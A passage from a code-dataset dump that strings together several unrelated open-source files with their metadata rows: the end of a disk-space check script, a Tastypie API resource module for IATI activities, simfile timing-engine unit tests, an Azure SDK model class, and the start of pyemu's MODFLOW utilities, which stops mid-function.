warn=1
warning=float(new_warning[i])/100*value['total']/1024
critical=float(new_critical[i])/100*value['total']/1024
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+format(warning,'.0f')+";"+format(critical,'.0f')+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
elif mega == 1: #megabajty used
for element in part_result:
for tag,value in element.items():
used=value['used']/1024/1024
if used < new_critical[i]:
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif used < new_warning[i]:
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
#sprawdzenie inode used
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+str(new_warning[i]*1024)+";"+str(new_critical[i]*1024)+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
if crit==1:
print "DISK CRITICAL Free Space "+outputCRIT+" "+outputINODE+"| "+perfdata
sys.exit(2)
elif warn==1:
print "DISK WARNING Free Space "+outputWARN+" "+outputINODE+"| "+perfdata
sys.exit(1)
else:
print "DISK OK Free Space "+outputOK+"| "+perfdata
sys.exit(0)
if __name__ == '__main__':
main()
| gpl-3.0 | -220,261,891,489,609,950 | 37.736842 | 170 | 0.56019 | false |
tokatikato/OIPA | OIPA/api/v3/resources/activity_view_resources.py | 1 | 12434 | # Tastypie specific
from tastypie import fields
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
# Data specific
from api.cache import NoTransformCache
from iati.models import ContactInfo, Activity, Organisation, AidType, FlowType, Sector, CollaborationType, \
TiedStatus, Transaction, ActivityStatus, Currency, OrganisationRole, ActivityScope, \
ActivityParticipatingOrganisation, Location, Result
from api.v3.resources.helper_resources import TitleResource, DescriptionResource, FinanceTypeResource, \
ActivityBudgetResource, DocumentResource, WebsiteResource, PolicyMarkerResource, OtherIdentifierResource
from api.v3.resources.advanced_resources import OnlyCountryResource, OnlyRegionResource
# cache specific
from django.http import HttpResponse
from cache.validator import Validator
from api.v3.resources.csv_serializer import CsvSerializer
from api.api_tools import comma_separated_parameter_to_list
from api.paginator import NoCountPaginator
class ActivityViewAidTypeResource(ModelResource):
class Meta:
queryset = AidType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewFlowTypeResource(ModelResource):
class Meta:
queryset = FlowType.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewSectorResource(ModelResource):
class Meta:
queryset = Sector.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewCollaborationTypeResource(ModelResource):
class Meta:
queryset = CollaborationType.objects.all()
include_resource_uri = False
excludes = ['description', 'language']
class ActivityViewTiedStatusResource(ModelResource):
class Meta:
queryset = TiedStatus.objects.all()
include_resource_uri = False
excludes = ['description']
class ActivityViewOrganisationRoleResource(ModelResource):
class Meta:
queryset = OrganisationRole.objects.all()
include_resource_uri = False
class ActivityViewOrganisationResource(ModelResource):
organisation_role = fields.ForeignKey(ActivityViewOrganisationRoleResource, 'organisation_role', full=True, null=True)
class Meta:
queryset = Organisation.objects.all()
include_resource_uri = False
excludes = ['abbreviation', 'reported_by_organisation']
filtering = {
'iati_identifier': 'exact',
'code': ALL_WITH_RELATIONS
}
class ActivityViewTransactionResource(ModelResource):
provider_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'provider_organisation', full=True, null=True)
receiver_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'receiver_organisation', full=True, null=True)
class Meta:
queryset = Transaction.objects.all()
include_resource_uri = False
excludes = ['id', 'ref', 'description', 'provider_activity']
allowed_methods = ['get']
def dehydrate(self, bundle):
bundle.data['disbursement_channel'] = bundle.obj.disbursement_channel_id
bundle.data['currency'] = bundle.obj.currency_id
bundle.data['tied_status'] = bundle.obj.tied_status_id
bundle.data['transaction_type'] = bundle.obj.transaction_type_id
return bundle
class ActivityViewParticipatingOrganisationResource(ModelResource):
organisation = fields.ToOneField(ActivityViewOrganisationResource, 'organisation', full=True, null=True)
class Meta:
queryset = ActivityParticipatingOrganisation.objects.all()
include_resource_uri = False
excludes = ['id']
filtering = {
'organisation': ALL_WITH_RELATIONS
}
def dehydrate(self, bundle):
bundle.data['role_id'] = bundle.obj.role_id
bundle.data['code'] = bundle.obj.organisation_id
return bundle
class ActivityViewActivityStatusResource(ModelResource):
class Meta:
queryset = ActivityStatus.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewActivityScopeResource(ModelResource):
class Meta:
queryset = ActivityScope.objects.all()
include_resource_uri = False
class ActivityViewCurrencyResource(ModelResource):
class Meta:
queryset = Currency.objects.all()
include_resource_uri = False
excludes = ['language']
class ActivityViewContactInfoResource(ModelResource):
class Meta:
queryset = ContactInfo.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityLocationResource(ModelResource):
class Meta:
queryset = Location.objects.all()
include_resource_uri = False
excludes = ['id', 'activity_description', 'adm_code', 'adm_country_adm1', 'adm_country_adm2',
'adm_country_name', 'adm_level', 'gazetteer_entry', 'location_id_code', 'point_srs_name',
'ref', 'type_description', 'point_pos']
class ActivityResultResource(ModelResource):
class Meta:
queryset = Result.objects.all()
include_resource_uri = False
excludes = ['id']
class ActivityResource(ModelResource):
countries = fields.ToManyField(OnlyCountryResource, 'recipient_country', full=True, null=True, use_in='all')
regions = fields.ToManyField(OnlyRegionResource, 'recipient_region', full=True, null=True, use_in='all')
sectors = fields.ToManyField(ActivityViewSectorResource, 'sector', full=True, null=True, use_in='all')
titles = fields.ToManyField(TitleResource, 'title_set', full=True, null=True, use_in='all')
descriptions = fields.ToManyField(DescriptionResource, 'description_set', full=True, null=True, use_in='all')
participating_organisations = fields.ToManyField(ActivityViewOrganisationResource, 'participating_organisation', full=True, null=True, use_in='all')
reporting_organisation = fields.ForeignKey(ActivityViewOrganisationResource, 'reporting_organisation', full=True, null=True, use_in='detail' )
activity_status = fields.ForeignKey(ActivityViewActivityStatusResource, 'activity_status', full=True, null=True, use_in='detail')
websites = fields.ToManyField(WebsiteResource, 'activity_website_set', full=True, null=True, use_in='detail')
policy_markers = fields.ToManyField(PolicyMarkerResource, 'policy_marker', full=True, null=True, use_in='detail')
collaboration_type = fields.ForeignKey(ActivityViewCollaborationTypeResource, attribute='collaboration_type', full=True, null=True, use_in='detail')
default_flow_type = fields.ForeignKey(ActivityViewFlowTypeResource, attribute='default_flow_type', full=True, null=True, use_in='detail')
default_finance_type = fields.ForeignKey(FinanceTypeResource, attribute='default_finance_type', full=True, null=True, use_in='detail')
default_aid_type = fields.ForeignKey(ActivityViewAidTypeResource, attribute='default_aid_type', full=True, null=True, use_in='detail')
default_tied_status = fields.ForeignKey(ActivityViewTiedStatusResource, attribute='default_tied_status', full=True, null=True, use_in='detail')
activity_scope = fields.ForeignKey(ActivityViewActivityScopeResource, attribute='scope', full=True, null=True, use_in='detail')
default_currency = fields.ForeignKey(ActivityViewCurrencyResource, attribute='default_currency', full=True, null=True, use_in='detail')
budget = fields.ToManyField(ActivityBudgetResource, 'budget_set', full=True, null=True, use_in='detail')
transactions = fields.ToManyField(ActivityViewTransactionResource, 'transaction_set', full=True, null=True, use_in='detail')
documents = fields.ToManyField(DocumentResource, 'documentlink_set', full=True, null=True, use_in='detail')
other_identifier = fields.ToManyField(OtherIdentifierResource, 'otheridentifier_set', full=True, null=True, use_in='detail')
locations = fields.ToManyField(ActivityLocationResource, 'location_set', full=True, null=True, use_in='all')
results = fields.ToManyField(ActivityResultResource, 'result_set', full=True, null=True, use_in='detail')
# to add:
# conditions
# contact
# country-budget?
# crsadd
# disbursement channel?
# ffs
# ffs forecast?
# planned disbursement
# related activity
# verification status
# vocabulary?
class Meta:
queryset = Activity.objects.all()
resource_name = 'activities'
max_limit = 1000
serializer = CsvSerializer()
excludes = ['date_created']
ordering = ['start_actual', 'start_planned', 'end_actual', 'end_planned', 'sectors', 'total_budget']
filtering = {
'iati_identifier': 'exact',
'start_planned': ALL,
'start_actual': ALL,
'end_planned': ALL,
'end_actual': ALL,
'total_budget': ALL,
'sectors': ('exact', 'in'),
'regions': ('exact', 'in'),
'countries': ('exact', 'in'),
'reporting_organisation': ('exact', 'in'),
'documents': ALL_WITH_RELATIONS
}
cache = NoTransformCache()
paginator_class = NoCountPaginator
def apply_filters(self, request, applicable_filters):
activity_list = super(ActivityResource, self).apply_filters(request, applicable_filters).prefetch_related('title_set').prefetch_related('description_set')
query = request.GET.get('query', None)
filter_year_param = request.GET.get('start_year_planned__in', None)
if query:
search_fields = comma_separated_parameter_to_list(request.GET.get('search_fields', None))
activity_list = activity_list.search(query, search_fields)
if filter_year_param:
years = comma_separated_parameter_to_list(filter_year_param)
activity_list = activity_list.filter_years(years)
return activity_list.distinct_if_necessary(applicable_filters)
def full_dehydrate(self, bundle, for_list=False):
#If the select_fields param is found, run this overwritten method.
#Otherwise run the default Tastypie method
select_fields_param = bundle.request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
for field_name, field_object in self.fields.items():
#If the field_name is in the list of requested fields dehydrate it
if (field_name) in select_fields:
# A touch leaky but it makes URI resolution work.
if getattr(field_object, 'dehydrated_type', None) == 'related':
field_object.api_name = self._meta.api_name
field_object.resource_name = self._meta.resource_name
bundle.data[field_name] = field_object.dehydrate(bundle, for_list=for_list)
# Check for an optional method to do further dehydration.
method = getattr(self, "dehydrate_%s" % field_name, None)
if method:
bundle.data[field_name] = method(bundle)
bundle = self.dehydrate(bundle)
return bundle
else:
return super(ActivityResource, self).full_dehydrate(bundle, for_list)
def get_list(self, request, **kwargs):
# check if call is cached using validator.is_cached
# check if call contains flush, if it does the call comes from the cache updater and shouldn't return cached results
validator = Validator()
cururl = request.META['PATH_INFO'] + "?" + request.META['QUERY_STRING']
if not 'flush' in cururl and validator.is_cached(cururl):
return HttpResponse(validator.get_cached_call(cururl), mimetype='application/json')
else:
return super(ActivityResource, self).get_list(request, **kwargs)
def alter_list_data_to_serialize(self, request, data):
select_fields_param = request.GET.get('select_fields', None)
if select_fields_param:
select_fields = comma_separated_parameter_to_list(select_fields_param)
data['meta']['selectable_fields'] = {f[0] for f in self.fields.items()} - {f for f in select_fields}
return data
| agpl-3.0 | 9,049,514,736,130,169,000 | 43.24911 | 162 | 0.687309 | false |
garcia/simfile | simfile/timing/tests/test_engine.py | 1 | 10046 | from decimal import Decimal
import unittest
from .helpers import *
from .. import *
from ..engine import *
class TestTimingEngine(unittest.TestCase):
def test_init(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(timing_data, engine.timing_data)
def test_bpm_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(-10000)))
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(0)))
self.assertEqual(Decimal('120.000'), engine.bpm_at(Beat(1) - Beat.tick()))
self.assertEqual(Decimal('150.000'), engine.bpm_at(Beat(1)))
self.assertEqual(Decimal('150.000'), engine.bpm_at(Beat(2) - Beat.tick()))
self.assertEqual(Decimal('200.000'), engine.bpm_at(Beat(2)))
self.assertEqual(Decimal('200.000'), engine.bpm_at(Beat(3) - Beat.tick()))
self.assertEqual(Decimal('300.000'), engine.bpm_at(Beat(3)))
self.assertEqual(Decimal('300.000'), engine.bpm_at(Beat(10000)))
def test_time_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertAlmostEqual(-0.491, engine.time_at(Beat(-1)))
self.assertAlmostEqual(0.009, engine.time_at(Beat(0)))
self.assertAlmostEqual(0.259, engine.time_at(Beat(0.5)))
self.assertAlmostEqual(0.509, engine.time_at(Beat(1)))
self.assertAlmostEqual(0.709, engine.time_at(Beat(1.5)))
self.assertAlmostEqual(0.909, engine.time_at(Beat(2)))
self.assertAlmostEqual(1.059, engine.time_at(Beat(2.5)))
self.assertAlmostEqual(1.565, engine.time_at(Beat(2.5) + Beat.tick()), places=3)
self.assertAlmostEqual(1.709, engine.time_at(Beat(3)))
self.assertAlmostEqual(1.813, engine.time_at(Beat(3) + Beat.tick()), places=3)
self.assertAlmostEqual(2.009, engine.time_at(Beat(4)))
self.assertAlmostEqual(201.209, engine.time_at(Beat(1000)))
def test_beat_at(self):
timing_data = testing_timing_data()
engine = TimingEngine(timing_data)
self.assertEqual(Beat(-1), engine.beat_at(-0.491))
self.assertEqual(Beat(0), engine.beat_at(0.009))
self.assertEqual(Beat(0.5), engine.beat_at(0.259))
self.assertEqual(Beat(1), engine.beat_at(0.509))
self.assertEqual(Beat(1.5), engine.beat_at(0.709))
self.assertEqual(Beat(2), engine.beat_at(0.909))
self.assertEqual(Beat(2.5), engine.beat_at(1.059))
self.assertEqual(Beat(2.5), engine.beat_at(1.559))
self.assertEqual(Beat(2.5) + Beat.tick(), engine.beat_at(1.566))
self.assertEqual(Beat(3), engine.beat_at(1.709))
self.assertEqual(Beat(3), engine.beat_at(1.809))
self.assertEqual(Beat(3) + Beat.tick(), engine.beat_at(1.814))
self.assertEqual(Beat(4), engine.beat_at(2.009))
self.assertEqual(Beat(1000), engine.beat_at(201.209))
def test_time_at_with_delays_and_warps(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertEqual(0, engine.time_at(Beat(0)))
self.assertEqual(0.5, engine.time_at(Beat(1), EventTag.DELAY))
self.assertEqual(0.75, engine.time_at(Beat(1), EventTag.STOP))
self.assertEqual(1.25, engine.time_at(Beat(2)))
self.assertEqual(1.25, engine.time_at(Beat(2.5)))
self.assertEqual(1.5, engine.time_at(Beat(3), EventTag.DELAY))
self.assertEqual(2.0, engine.time_at(Beat(3), EventTag.STOP))
self.assertEqual(2.25, engine.time_at(Beat(3), EventTag.STOP_END))
self.assertEqual(2.75, engine.time_at(Beat(4), EventTag.STOP))
self.assertEqual(3.0, engine.time_at(Beat(4), EventTag.STOP_END))
self.assertEqual(3.0, engine.time_at(Beat(4.5)))
self.assertEqual(3.25, engine.time_at(Beat(5)))
self.assertEqual(3.25, engine.time_at(Beat(5.25), EventTag.STOP))
self.assertEqual(3.5, engine.time_at(Beat(5.25), EventTag.STOP_END))
self.assertEqual(3.5, engine.time_at(Beat(5.5)))
self.assertEqual(3.75, engine.time_at(Beat(6)))
self.assertEqual(3.75, engine.time_at(Beat(6.5), EventTag.STOP))
self.assertEqual(4.0, engine.time_at(Beat(6.5), EventTag.STOP_END))
self.assertEqual(4.25, engine.time_at(Beat(7), EventTag.DELAY))
self.assertEqual(4.5, engine.time_at(Beat(7), EventTag.DELAY_END))
self.assertEqual(4.5, engine.time_at(Beat(7.5)))
self.assertEqual(4.75, engine.time_at(Beat(8)))
self.assertEqual(4.75, engine.time_at(Beat(8.25), EventTag.DELAY))
self.assertEqual(5.0, engine.time_at(Beat(8.25), EventTag.DELAY_END))
self.assertEqual(5.0, engine.time_at(Beat(8.5)))
self.assertEqual(5.25, engine.time_at(Beat(9)))
self.assertEqual(5.25, engine.time_at(Beat(9.5), EventTag.DELAY))
self.assertEqual(5.5, engine.time_at(Beat(9.5), EventTag.DELAY_END))
self.assertEqual(5.75, engine.time_at(Beat(10)))
self.assertEqual(5.75, engine.time_at(Beat(10.25)))
self.assertEqual(5.75, engine.time_at(Beat(10.5)))
self.assertEqual(5.75, engine.time_at(Beat(10.75)))
self.assertEqual(5.875, engine.time_at(Beat(11)))
self.assertEqual(5.875, engine.time_at(Beat(11.25)))
self.assertEqual(5.875, engine.time_at(Beat(11.5)))
self.assertEqual(5.875, engine.time_at(Beat(11.75)))
self.assertEqual(6.0, engine.time_at(Beat(12)))
self.assertEqual(6.0, engine.time_at(Beat(12.25)))
self.assertEqual(6.0, engine.time_at(Beat(12.5)))
self.assertEqual(6.0, engine.time_at(Beat(12.75)))
self.assertEqual(6.125, engine.time_at(Beat(13)))
def test_beat_at_with_delays_and_warps(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertEqual(Beat(0), engine.beat_at(0))
self.assertEqual(Beat(1), engine.beat_at(0.5))
self.assertEqual(Beat(1), engine.beat_at(0.75))
self.assertEqual(Beat(2.5), engine.beat_at(1.25))
self.assertEqual(Beat(3), engine.beat_at(1.5))
self.assertEqual(Beat(3), engine.beat_at(2.0))
self.assertEqual(Beat(3), engine.beat_at(2.25))
self.assertEqual(Beat(4), engine.beat_at(2.75))
self.assertEqual(Beat(4), engine.beat_at(3.0, EventTag.WARP))
self.assertEqual(Beat(4.5), engine.beat_at(3.0))
self.assertEqual(Beat(5), engine.beat_at(3.25, EventTag.WARP))
self.assertEqual(Beat(5.25), engine.beat_at(3.25))
self.assertEqual(Beat(5.25), engine.beat_at(3.5, EventTag.WARP))
self.assertEqual(Beat(5.5), engine.beat_at(3.5))
self.assertEqual(Beat(6.0), engine.beat_at(3.75, EventTag.WARP))
self.assertEqual(Beat(6.5), engine.beat_at(3.75))
self.assertEqual(Beat(6.5), engine.beat_at(4.0))
self.assertEqual(Beat(7), engine.beat_at(4.25))
self.assertEqual(Beat(7), engine.beat_at(4.5, EventTag.WARP))
self.assertEqual(Beat(7.5), engine.beat_at(4.5))
self.assertEqual(Beat(8), engine.beat_at(4.75, EventTag.WARP))
self.assertEqual(Beat(8.25), engine.beat_at(4.75))
self.assertEqual(Beat(8.5), engine.beat_at(5.0))
self.assertEqual(Beat(9), engine.beat_at(5.25, EventTag.WARP))
self.assertEqual(Beat(9.5), engine.beat_at(5.25))
self.assertEqual(Beat(9.5), engine.beat_at(5.5))
self.assertEqual(Beat(10.0), engine.beat_at(5.75, EventTag.WARP))
self.assertEqual(Beat(10.75), engine.beat_at(5.75))
self.assertEqual(Beat(11.0), engine.beat_at(5.875, EventTag.WARP))
self.assertEqual(Beat(11.75), engine.beat_at(5.875))
self.assertEqual(Beat(12.0), engine.beat_at(6.0, EventTag.WARP))
self.assertEqual(Beat(12.75), engine.beat_at(6.0))
def test_hittable(self):
timing_data = testing_timing_data_with_delays_and_warps()
engine = TimingEngine(timing_data)
self.assertTrue(engine.hittable(Beat(0)))
self.assertTrue(engine.hittable(Beat(1)))
self.assertFalse(engine.hittable(Beat(2)))
self.assertFalse(engine.hittable(Beat(2.25)))
self.assertTrue(engine.hittable(Beat(2.5)))
self.assertTrue(engine.hittable(Beat(3)))
self.assertTrue(engine.hittable(Beat(4)))
self.assertFalse(engine.hittable(Beat(4.25)))
self.assertTrue(engine.hittable(Beat(4.5)))
self.assertFalse(engine.hittable(Beat(5)))
self.assertTrue(engine.hittable(Beat(5.25)))
self.assertTrue(engine.hittable(Beat(5.5)))
self.assertFalse(engine.hittable(Beat(6)))
self.assertFalse(engine.hittable(Beat(6.25)))
self.assertTrue(engine.hittable(Beat(6.5)))
self.assertTrue(engine.hittable(Beat(7)))
self.assertFalse(engine.hittable(Beat(7.25)))
self.assertTrue(engine.hittable(Beat(7.5)))
self.assertFalse(engine.hittable(Beat(8)))
self.assertTrue(engine.hittable(Beat(8.25)))
self.assertTrue(engine.hittable(Beat(8.5)))
self.assertFalse(engine.hittable(Beat(9)))
self.assertFalse(engine.hittable(Beat(9.25)))
self.assertTrue(engine.hittable(Beat(9.5)))
self.assertFalse(engine.hittable(Beat(10)))
self.assertFalse(engine.hittable(Beat(10.25)))
self.assertFalse(engine.hittable(Beat(10.5)))
self.assertTrue(engine.hittable(Beat(10.75)))
self.assertFalse(engine.hittable(Beat(11)))
self.assertFalse(engine.hittable(Beat(11.25)))
self.assertFalse(engine.hittable(Beat(11.5)))
self.assertTrue(engine.hittable(Beat(11.75)))
self.assertFalse(engine.hittable(Beat(12)))
self.assertFalse(engine.hittable(Beat(12.25)))
self.assertFalse(engine.hittable(Beat(12.5)))
self.assertTrue(engine.hittable(Beat(12.75)))
self.assertTrue(engine.hittable(Beat(13))) | mit | -8,069,988,434,666,341,000 | 53.308108 | 88 | 0.646825 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-compute/azure/mgmt/compute/v2016_03_30/models/virtual_machine_scale_set_instance_view_statuses_summary.py | 1 | 1313 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VirtualMachineScaleSetInstanceViewStatusesSummary(Model):
"""Instance view statuses summary for virtual machines of a virtual machine
scale set.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar statuses_summary: The extensions information.
:vartype statuses_summary:
list[~azure.mgmt.compute.v2016_03_30.models.VirtualMachineStatusCodeCount]
"""
_validation = {
'statuses_summary': {'readonly': True},
}
_attribute_map = {
'statuses_summary': {'key': 'statusesSummary', 'type': '[VirtualMachineStatusCodeCount]'},
}
def __init__(self, **kwargs):
super(VirtualMachineScaleSetInstanceViewStatusesSummary, self).__init__(**kwargs)
self.statuses_summary = None
| mit | -2,771,557,624,166,246,400 | 34.486486 | 98 | 0.633663 | false |
jtwhite79/pyemu | pyemu/utils/gw_utils.py | 1 | 110032 | """MODFLOW support utilities"""
import os
from datetime import datetime
import shutil
import warnings
import numpy as np
import pandas as pd
import re
pd.options.display.max_colwidth = 100
from pyemu.pst.pst_utils import (
SFMT,
IFMT,
FFMT,
pst_config,
parse_tpl_file,
try_process_output_file,
)
from pyemu.utils.os_utils import run
from pyemu.utils.helpers import _write_df_tpl
from ..pyemu_warnings import PyemuWarning
PP_FMT = {
"name": SFMT,
"x": FFMT,
"y": FFMT,
"zone": IFMT,
"tpl": SFMT,
"parval1": FFMT,
}
PP_NAMES = ["name", "x", "y", "zone", "parval1"]
def modflow_pval_to_template_file(pval_file, tpl_file=None):
"""write a template file for a modflow parameter value file.
Args:
pval_file (`str`): the path and name of the existing modflow pval file
tpl_file (`str`, optional): template file to write. If None, use
`pval_file` +".tpl". Default is None
Note:
Uses names in the first column in the pval file as par names.
Returns:
**pandas.DataFrame**: a dataFrame with control file parameter information
"""
if tpl_file is None:
tpl_file = pval_file + ".tpl"
pval_df = pd.read_csv(
pval_file,
delim_whitespace=True,
header=None,
skiprows=2,
names=["parnme", "parval1"],
)
pval_df.index = pval_df.parnme
pval_df.loc[:, "tpl"] = pval_df.parnme.apply(lambda x: " ~ {0:15s} ~".format(x))
with open(tpl_file, "w") as f:
f.write("ptf ~\n#pval template file from pyemu\n")
f.write("{0:10d} #NP\n".format(pval_df.shape[0]))
f.write(
pval_df.loc[:, ["parnme", "tpl"]].to_string(
col_space=0,
formatters=[SFMT, SFMT],
index=False,
header=False,
justify="left",
)
)
return pval_df
def modflow_hob_to_instruction_file(hob_file, ins_file=None):
"""write an instruction file for a modflow head observation file
Args:
hob_file (`str`): the path and name of the existing modflow hob file
ins_file (`str`, optional): the name of the instruction file to write.
If `None`, `hob_file` +".ins" is used. Default is `None`.
Returns:
**pandas.DataFrame**: a dataFrame with control file observation information
"""
hob_df = pd.read_csv(
hob_file,
delim_whitespace=True,
skiprows=1,
header=None,
names=["simval", "obsval", "obsnme"],
)
hob_df.loc[:, "obsnme"] = hob_df.obsnme.apply(str.lower)
hob_df.loc[:, "ins_line"] = hob_df.obsnme.apply(lambda x: "l1 !{0:s}!".format(x))
hob_df.loc[0, "ins_line"] = hob_df.loc[0, "ins_line"].replace("l1", "l2")
if ins_file is None:
ins_file = hob_file + ".ins"
f_ins = open(ins_file, "w")
f_ins.write("pif ~\n")
f_ins.write(
hob_df.loc[:, ["ins_line"]].to_string(
col_space=0,
columns=["ins_line"],
header=False,
index=False,
formatters=[SFMT],
)
+ "\n"
)
hob_df.loc[:, "weight"] = 1.0
hob_df.loc[:, "obgnme"] = "obgnme"
f_ins.close()
return hob_df
def modflow_hydmod_to_instruction_file(hydmod_file, ins_file=None):
"""write an instruction file for a modflow hydmod file
Args:
hydmod_file (`str`): the path and name of the existing modflow hob file
ins_file (`str`, optional): the name of the instruction file to write.
If `None`, `hydmod_file` +".ins" is used. Default is `None`.
Returns:
**pandas.DataFrame**: a dataFrame with control file observation information
Note:
calls `pyemu.gw_utils.modflow_read_hydmod_file()`
"""
hydmod_df, hydmod_outfile = modflow_read_hydmod_file(hydmod_file)
hydmod_df.loc[:, "ins_line"] = hydmod_df.obsnme.apply(
lambda x: "l1 w !{0:s}!".format(x)
)
if ins_file is None:
ins_file = hydmod_outfile + ".ins"
with open(ins_file, "w") as f_ins:
f_ins.write("pif ~\nl1\n")
f_ins.write(
hydmod_df.loc[:, ["ins_line"]].to_string(
col_space=0,
columns=["ins_line"],
header=False,
index=False,
formatters=[SFMT],
)
+ "\n"
)
hydmod_df.loc[:, "weight"] = 1.0
hydmod_df.loc[:, "obgnme"] = "obgnme"
df = try_process_output_file(hydmod_outfile + ".ins")
if df is not None:
df.loc[:, "obsnme"] = df.index.values
df.loc[:, "obgnme"] = df.obsnme.apply(lambda x: x[:-9])
df.to_csv("_setup_" + os.path.split(hydmod_outfile)[-1] + ".csv", index=False)
return df
return hydmod_df
def modflow_read_hydmod_file(hydmod_file, hydmod_outfile=None):
"""read a binary hydmod file and return a dataframe of the results
Args:
hydmod_file (`str`): The path and name of the existing modflow hydmod binary file
hydmod_outfile (`str`, optional): output file to write. If `None`, use `hydmod_file` +".dat".
Default is `None`.
Returns:
**pandas.DataFrame**: a dataFrame with hymod_file values
"""
try:
import flopy.utils as fu
except Exception as e:
print("flopy is not installed - cannot read {0}\n{1}".format(hydmod_file, e))
return
obs = fu.HydmodObs(hydmod_file)
hyd_df = obs.get_dataframe()
hyd_df.columns = [i[2:] if i.lower() != "totim" else i for i in hyd_df.columns]
# hyd_df.loc[:,"datetime"] = hyd_df.index
hyd_df["totim"] = hyd_df.index.map(lambda x: x.strftime("%Y%m%d"))
hyd_df.rename(columns={"totim": "datestamp"}, inplace=True)
# reshape into a single column
hyd_df = pd.melt(hyd_df, id_vars="datestamp")
hyd_df.rename(columns={"value": "obsval"}, inplace=True)
hyd_df["obsnme"] = [
i.lower() + "_" + j.lower() for i, j in zip(hyd_df.variable, hyd_df.datestamp)
]
vc = hyd_df.obsnme.value_counts().sort_values()
vc = list(vc.loc[vc > 1].index.values)
if len(vc) > 0:
hyd_df.to_csv("hyd_df.duplciates.csv")
obs.get_dataframe().to_csv("hyd_org.duplicates.csv")
raise Exception("duplicates in obsnme:{0}".format(vc))
# assert hyd_df.obsnme.value_counts().max() == 1,"duplicates in obsnme"
if not hydmod_outfile:
hydmod_outfile = hydmod_file + ".dat"
hyd_df.to_csv(hydmod_outfile, columns=["obsnme", "obsval"], sep=" ", index=False)
# hyd_df = hyd_df[['obsnme','obsval']]
return hyd_df[["obsnme", "obsval"]], hydmod_outfile
def setup_mtlist_budget_obs(
list_filename,
gw_filename="mtlist_gw.dat",
sw_filename="mtlist_sw.dat",
start_datetime="1-1-1970",
gw_prefix="gw",
sw_prefix="sw",
save_setup_file=False,
):
"""setup observations of gw (and optionally sw) mass budgets from mt3dusgs list file.
Args:
list_filename (`str`): path and name of existing modflow list file
gw_filename (`str`, optional): output filename that will contain the gw budget
observations. Default is "mtlist_gw.dat"
sw_filename (`str`, optional): output filename that will contain the sw budget
observations. Default is "mtlist_sw.dat"
start_datetime (`str`, optional): an str that can be parsed into a `pandas.TimeStamp`.
used to give budget observations meaningful names. Default is "1-1-1970".
gw_prefix (`str`, optional): a prefix to add to the GW budget observations.
Useful if processing more than one list file as part of the forward run process.
Default is 'gw'.
sw_prefix (`str`, optional): a prefix to add to the SW budget observations. Useful
if processing more than one list file as part of the forward run process.
Default is 'sw'.
save_setup_file (`bool`, optional): a flag to save "_setup_"+ `list_filename` +".csv" file
that contains useful control file information. Default is `False`.
Returns:
tuple containing
- **str**: the command to add to the forward run script
- **str**: the names of the instruction files that were created
- **pandas.DataFrame**: a dataframe with information for constructing a control file
Note:
writes an instruction file and also a _setup_.csv to use when constructing a pest
control file
The instruction files are named `out_filename` +".ins"
It is recommended to use the default value for `gw_filename` or `sw_filename`.
This is the companion function of `gw_utils.apply_mtlist_budget_obs()`.
"""
gw, sw = apply_mtlist_budget_obs(
list_filename, gw_filename, sw_filename, start_datetime
)
gw_ins = gw_filename + ".ins"
_write_mtlist_ins(gw_ins, gw, gw_prefix)
ins_files = [gw_ins]
df_gw = try_process_output_file(gw_ins, gw_filename)
if df_gw is None:
raise Exception("error processing groundwater instruction file")
if sw is not None:
sw_ins = sw_filename + ".ins"
_write_mtlist_ins(sw_ins, sw, sw_prefix)
ins_files.append(sw_ins)
df_sw = try_process_output_file(sw_ins, sw_filename)
if df_sw is None:
raise Exception("error processing surface water instruction file")
df_gw = df_gw.append(df_sw)
df_gw.loc[:, "obsnme"] = df_gw.index.values
if save_setup_file:
df_gw.to_csv("_setup_" + os.path.split(list_filename)[-1] + ".csv", index=False)
frun_line = "pyemu.gw_utils.apply_mtlist_budget_obs('{0}')".format(list_filename)
return frun_line, ins_files, df_gw
def _write_mtlist_ins(ins_filename, df, prefix):
"""write an instruction file for a MT3D-USGS list file"""
try:
dt_str = df.index.map(lambda x: x.strftime("%Y%m%d"))
except:
dt_str = df.index.map(lambda x: "{0:08.1f}".format(x).strip())
with open(ins_filename, "w") as f:
f.write("pif ~\nl1\n")
for dt in dt_str:
f.write("l1 ")
for col in df.columns.str.translate(
{ord(s): None for s in ["(", ")", "/", "="]}
):
if prefix == "":
obsnme = "{0}_{1}".format(col, dt)
